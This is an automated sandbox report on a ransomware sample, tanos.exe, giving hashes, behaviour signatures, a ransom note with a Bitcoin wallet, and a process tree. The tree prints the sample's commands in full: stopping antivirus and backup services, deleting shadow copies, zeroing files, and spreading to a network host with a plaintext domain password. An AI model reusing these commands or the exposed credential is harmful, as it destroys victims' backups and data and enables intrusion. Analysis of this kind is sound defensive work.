Analysis
max time kernel: 943s
max time network: 946s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 17-05-2022 10:35
Static task: static1
Behavioral task: behavioral1
  Sample: tanos.exe
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: tanos.exe
  Resource: win10v2004-20220414-en
General
Target: tanos.exe
Size: 87KB
MD5: d6d956267a268c9dcf48445629d2803e
SHA1: cc0feae505dad9c140dd21d1b40b518d8e61b3a4
SHA256: c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850
SHA512: e0791f6eb3116d0590be3af3713c94f787f7ced8e904d4bb8fc0d1341f332053414cb1e9095ae2de041b9e6d6d55cf773bf45ebeb74f27bb95c11a3cc364abee
Malware Config
Signatures
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource | yara_rule
behavioral2/memory/4720-130-0x0000000000F30000-0x0000000000F4C000-memory.dmp | disable_win_def
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
Blocklisted process makes network request 2 IoCs
flow | pid | Process
21 | 1820 | mshta.exe
22 | 1820 | mshta.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs
pid | Process
556 | k0xherol.exe
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
description | ioc | Process
File created | C:\Users\Admin\Pictures\MergeJoin.tiff.crypted | tanos.exe
File opened for modification | C:\Users\Admin\Pictures\MergeJoin.tiff | tanos.exe
File created | C:\Users\Admin\Pictures\RepairResume.png.crypted | tanos.exe
File created | C:\Users\Admin\Pictures\UnregisterStart.raw.crypted | tanos.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | tanos.exe
Drops startup file 1 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | tanos.exe
Windows security modification
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | tanos.exe
Enumerates connected drives 3 TTPs 14 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\e: | vssadmin.exe
File opened (read-only) | \??\f: | vssadmin.exe
File opened (read-only) | \??\F: | vssadmin.exe
File opened (read-only) | \??\F: | vssadmin.exe
File opened (read-only) | \??\G: | vssadmin.exe
File opened (read-only) | \??\h: | vssadmin.exe
File opened (read-only) | \??\E: | vssadmin.exe
File opened (read-only) | \??\e: | vssadmin.exe
File opened (read-only) | \??\g: | vssadmin.exe
File opened (read-only) | \??\E: | vssadmin.exe
File opened (read-only) | \??\H: | vssadmin.exe
File opened (read-only) | \??\D: | vssadmin.exe
File opened (read-only) | \??\D: | vssadmin.exe
File opened (read-only) | \??\f: | vssadmin.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Modifies WinLogon 2 TTPs 2 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." | tanos.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" | tanos.exe
Launches sc.exe
sc.exe is a Windows utility to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
3264 | vssadmin.exe
5032 | vssadmin.exe
680 | vssadmin.exe
3908 | vssadmin.exe
5100 | vssadmin.exe
1988 | vssadmin.exe
1232 | vssadmin.exe
4548 | vssadmin.exe
224 | vssadmin.exe
3168 | vssadmin.exe
3864 | vssadmin.exe
3576 | vssadmin.exe
1396 | vssadmin.exe
2752 | vssadmin.exe
Kills process with taskkill 3 IoCs
pid | Process
2604 | taskkill.exe
4672 | taskkill.exe
3384 | taskkill.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs
pid | Process
4180 | PING.EXE
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4716 | powershell.exe
4716 | powershell.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
Suspicious use of AdjustPrivilegeToken 11 IoCs
description | pid | Process
Token: SeDebugPrivilege | 4720 | tanos.exe
Token: SeDebugPrivilege | 4716 | powershell.exe
Token: SeDebugPrivilege | 2604 | taskkill.exe
Token: SeDebugPrivilege | 4672 | taskkill.exe
Token: SeDebugPrivilege | 3384 | taskkill.exe
Token: SeBackupPrivilege | 5924 | vssvc.exe
Token: SeRestorePrivilege | 5924 | vssvc.exe
Token: SeAuditPrivilege | 5924 | vssvc.exe
Token: SeAssignPrimaryTokenPrivilege | 556 | k0xherol.exe
Token: SeIncreaseQuotaPrivilege | 556 | k0xherol.exe
Token: SeImpersonatePrivilege | 556 | k0xherol.exe
Suspicious use of FindShellTrayWindow 3 IoCs
pid | Process
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
Suspicious use of SendNotifyMessage 3 IoCs
pid | Process
4720 | tanos.exe
4720 | tanos.exe
4720 | tanos.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 4720 wrote to memory of 4716 | 4720 | tanos.exe | 84
PID 4720 wrote to memory of 4716 | 4720 | tanos.exe | 84
PID 4720 wrote to memory of 4240 | 4720 | tanos.exe | 86
PID 4720 wrote to memory of 4240 | 4720 | tanos.exe | 86
PID 4720 wrote to memory of 5092 | 4720 | tanos.exe | 87
PID 4720 wrote to memory of 5092 | 4720 | tanos.exe | 87
PID 4720 wrote to memory of 4976 | 4720 | tanos.exe | 90
PID 4720 wrote to memory of 4976 | 4720 | tanos.exe | 90
PID 4720 wrote to memory of 5036 | 4720 | tanos.exe | 91
PID 4720 wrote to memory of 5036 | 4720 | tanos.exe | 91
PID 4720 wrote to memory of 5060 | 4720 | tanos.exe | 94
PID 4720 wrote to memory of 5060 | 4720 | tanos.exe | 94
PID 4720 wrote to memory of 4924 | 4720 | tanos.exe | 106
PID 4720 wrote to memory of 4924 | 4720 | tanos.exe | 106
PID 4720 wrote to memory of 4776 | 4720 | tanos.exe | 105
PID 4720 wrote to memory of 4776 | 4720 | tanos.exe | 105
PID 4240 wrote to memory of 1420 | 4240 | net.exe | 96
PID 4240 wrote to memory of 1420 | 4240 | net.exe | 96
PID 4720 wrote to memory of 3188 | 4720 | tanos.exe | 103
PID 4720 wrote to memory of 3188 | 4720 | tanos.exe | 103
PID 4720 wrote to memory of 3220 | 4720 | tanos.exe | 98
PID 4720 wrote to memory of 3220 | 4720 | tanos.exe | 98
PID 4720 wrote to memory of 116 | 4720 | tanos.exe | 99
PID 4720 wrote to memory of 116 | 4720 | tanos.exe | 99
PID 5092 wrote to memory of 224 | 5092 | net.exe | 187
PID 5092 wrote to memory of 224 | 5092 | net.exe | 187
PID 4720 wrote to memory of 3832 | 4720 | tanos.exe | 107
PID 4720 wrote to memory of 3832 | 4720 | tanos.exe | 107
PID 4720 wrote to memory of 4072 | 4720 | tanos.exe | 108
PID 4720 wrote to memory of 4072 | 4720 | tanos.exe | 108
PID 4976 wrote to memory of 4480 | 4976 | net.exe | 177
PID 4976 wrote to memory of 4480 | 4976 | net.exe | 177
PID 4720 wrote to memory of 3720 | 4720 | tanos.exe | 110
PID 4720 wrote to memory of 3720 | 4720 | tanos.exe | 110
PID 5036 wrote to memory of 3512 | 5036 | net.exe | 113
PID 5036 wrote to memory of 3512 | 5036 | net.exe | 113
PID 5060 wrote to memory of 4580 | 5060 | net.exe | 240
PID 5060 wrote to memory of 4580 | 5060 | net.exe | 240
PID 4720 wrote to memory of 4612 | 4720 | tanos.exe | 239
PID 4720 wrote to memory of 4612 | 4720 | tanos.exe | 239
PID 4720 wrote to memory of 4088 | 4720 | tanos.exe | 237
PID 4720 wrote to memory of 4088 | 4720 | tanos.exe | 237
PID 4924 wrote to memory of 3476 | 4924 | net.exe | 236
PID 4924 wrote to memory of 3476 | 4924 | net.exe | 236
PID 4720 wrote to memory of 2208 | 4720 | tanos.exe | 234
PID 4720 wrote to memory of 2208 | 4720 | tanos.exe | 234
PID 4776 wrote to memory of 2964 | 4776 | net.exe | 114
PID 4776 wrote to memory of 2964 | 4776 | net.exe | 114
PID 4720 wrote to memory of 3468 | 4720 | tanos.exe | 115
PID 4720 wrote to memory of 3468 | 4720 | tanos.exe | 115
PID 3188 wrote to memory of 5020 | 3188 | net.exe | 232
PID 3188 wrote to memory of 5020 | 3188 | net.exe | 232
PID 3220 wrote to memory of 628 | 3220 | net.exe | 231
PID 3220 wrote to memory of 628 | 3220 | net.exe | 231
PID 4720 wrote to memory of 1040 | 4720 | tanos.exe | 230
PID 4720 wrote to memory of 1040 | 4720 | tanos.exe | 230
PID 4720 wrote to memory of 964 | 4720 | tanos.exe | 118
PID 4720 wrote to memory of 964 | 4720 | tanos.exe | 118
PID 116 wrote to memory of 2700 | 116 | net.exe | 229
PID 116 wrote to memory of 2700 | 116 | net.exe | 229
PID 4720 wrote to memory of 1836 | 4720 | tanos.exe | 227
PID 4720 wrote to memory of 1836 | 4720 | tanos.exe | 227
PID 4072 wrote to memory of 4432 | 4072 | net.exe | 226
PID 4072 wrote to memory of 4432 | 4072 | net.exe | 226
Processes
Each entry reads: image path | command line | PID, indented by process-tree depth; matched signatures are listed beneath the entry.
C:\Users\Admin\AppData\Local\Temp\tanos.exe | "C:\Users\Admin\AppData\Local\Temp\tanos.exe" | PID:4720
- Modifies extensions of user files
- Checks computer location settings
- Drops startup file
- Windows security modification
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "powershell" Get-MpPreference -verbose | PID:4716
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop avpsus /y | PID:4240
    - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop avpsus /y | PID:1420
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop McAfeeDLPAgentService /y | PID:5092
    - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop McAfeeDLPAgentService /y | PID:224
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop mfewc /y | PID:4976
    - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop mfewc /y | PID:4480
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop BMR Boot Service /y | PID:5036
    - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop BMR Boot Service /y | PID:3512
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop NetBackup BMR MTFTP Service /y | PID:5060
    - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y | PID:4580
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop SavRoam /y | PID:3220
    - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop SavRoam /y | PID:628
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop RTVscan /y | PID:116
    - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop RTVscan /y | PID:2700
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop ccSetMgr /y | PID:3188
    - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop ccSetMgr /y | PID:5020
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop ccEvtMgr /y | PID:4776
    - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop ccEvtMgr /y | PID:2964
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop DefWatch /y | PID:4924
    - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop DefWatch /y | PID:3476
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop QBFCService /y | PID:3832
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop QBFCService /y | PID:2888
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop QBIDPService /y | PID:4072
    - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop QBIDPService /y | PID:4432
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop Intuit.QuickBooks.FCS /y | PID:3720
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y | PID:956
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop zhudongfangyu /y | PID:3468
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop zhudongfangyu /y | PID:3320
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop VSNAPVSS /y | PID:964
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop VSNAPVSS /y | PID:3844
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop VeeamDeploymentService /y | PID:3460
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop VeeamDeploymentService /y | PID:4648
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop PDVFSService /y | PID:924
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop PDVFSService /y | PID:112
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop BackupExecVSSProvider /y | PID:1744
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop BackupExecVSSProvider /y | PID:4952
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop BackupExecDiveciMediaService /y | PID:1468
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y | PID:996
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop BackupExecJobEngine /y | PID:4956
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop BackupExecJobEngine /y | PID:4788
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop BackupExecRPCService /y | PID:3976
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop BackupExecRPCService /y | PID:5296
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop AcronisAgent /y | PID:4188
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop AcronisAgent /y | PID:5436
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop AcrSch2Svc /y | PID:4488
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop AcrSch2Svc /y | PID:5424
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop BackupExecManagementService /y | PID:804
        C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop BackupExecManagementService /y | PID:5304
    C:\Windows\SYSTEM32\net.exe | "net.exe" use \\10.127.0.75 /USER:SHJPOLICE\amer !Omar2012 | PID:6060
    C:\Windows\SYSTEM32\cmd.exe | "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin | PID:5096
    C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" Delete Shadows /all /quiet | PID:3864
    - Interacts with shadow copies
    C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded | PID:5032
    - Enumerates connected drives
    - Interacts with shadow copies
    C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB | PID:680
    - Interacts with shadow copies
    C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded | PID:3576
    - Interacts with shadow copies
    C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB | PID:1396
    - Enumerates connected drives
    - Interacts with shadow copies
    C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded | PID:224
    - Enumerates connected drives
    - Interacts with shadow copies
    C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB | PID:1232
    - Enumerates connected drives
    - Interacts with shadow copies
    C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded | PID:4548
    - Enumerates connected drives
    - Interacts with shadow copies
    C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB | PID:2752
    - Enumerates connected drives
    - Interacts with shadow copies
    C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded | PID:3908
    - Enumerates connected drives
    - Interacts with shadow copies
    C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB | PID:5100
    - Enumerates connected drives
    - Interacts with shadow copies
    C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded | PID:1988
    - Interacts with shadow copies
    C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB | PID:3264
    - Interacts with shadow copies
    C:\Windows\SYSTEM32\vssadmin.exe | "vssadmin.exe" Delete Shadows /all /quiet | PID:3168
    - Interacts with shadow copies
    C:\Windows\SYSTEM32\taskkill.exe | "taskkill.exe" /IM mydesktopservice.exe /F | PID:2604
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SYSTEM32\taskkill.exe | "taskkill.exe" /IM mydesktopqos.exe /F | PID:4672
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SYSTEM32\taskkill.exe | "taskkill.exe" /IM mspub.exe /F | PID:3384
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SYSTEM32\sc.exe | "sc.exe" config SstpSvc start= disabled | PID:320
    C:\Windows\SYSTEM32\sc.exe | "sc.exe" config SQLWriter start= disabled | PID:1612
    C:\Windows\SYSTEM32\sc.exe | "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled | PID:4580
    C:\Windows\SYSTEM32\sc.exe | "sc.exe" config SQLTELEMETRY start= disabled | PID:2896
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop sophos /y | PID:5116
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop CAARCUpdateSvc /y | PID:3716
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop CASAD2DWebSvc /y | PID:3924
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop BackupExecAgentBrowser /y | PID:1448
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop BackupExecAgentAccelerator /y | PID:2628
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop veeam /y | PID:4892
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop VeeamNFSSvc /y | PID:4784
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop VeeamTransportSvc /y | PID:1836
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop stc_raw_agent /y | PID:1040
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop YooIT /y | PID:2208
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop YooBackup /y | PID:4088
    C:\Windows\SYSTEM32\net.exe | "net.exe" stop QBCFMonitorService /y | PID:4612
    C:\Users\Admin\AppData\Local\Temp\k0xherol.exe | "C:\Users\Admin\AppData\Local\Temp\k0xherol.exe" \10.127.0.75 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\tanos.exe | PID:556
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SYSTEM32\arp.exe | "arp" -a | PID:2464
    C:\Windows\System32\mshta.exe | "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta | PID:1820
    - Blocklisted process makes network request
    C:\Windows\SYSTEM32\cmd.exe | "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s” | PID:3912
        C:\Windows\system32\PING.EXE | ping 127.0.0.7 -n 3 | PID:4180
        - Runs ping.exe
        C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=524288 “%s” | PID:720
    C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\tanos.exe | PID:1884
        C:\Windows\system32\choice.exe | choice /C Y /N /D Y /T 3 | PID:4716
C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop QBCFMonitorService /y | PID:4576
C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop YooBackup /y | PID:1304
C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop VeeamNFSSvc /y | PID:4180
C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop veeam /y | PID:4992
C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop VeeamTransportSvc /y | PID:1984
C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop CASAD2DWebSvc /y | PID:5656
C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop sophos /y | PID:5688
C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop CAARCUpdateSvc /y | PID:5664
C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | PID:5924
- Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:4480
C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop BackupExecAgentBrowser /y | PID:744
C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y | PID:3048
C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop stc_raw_agent /y | PID:368
C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop YooIT /y | PID:4060
Network
MITRE ATT&CK Enterprise v6
Downloads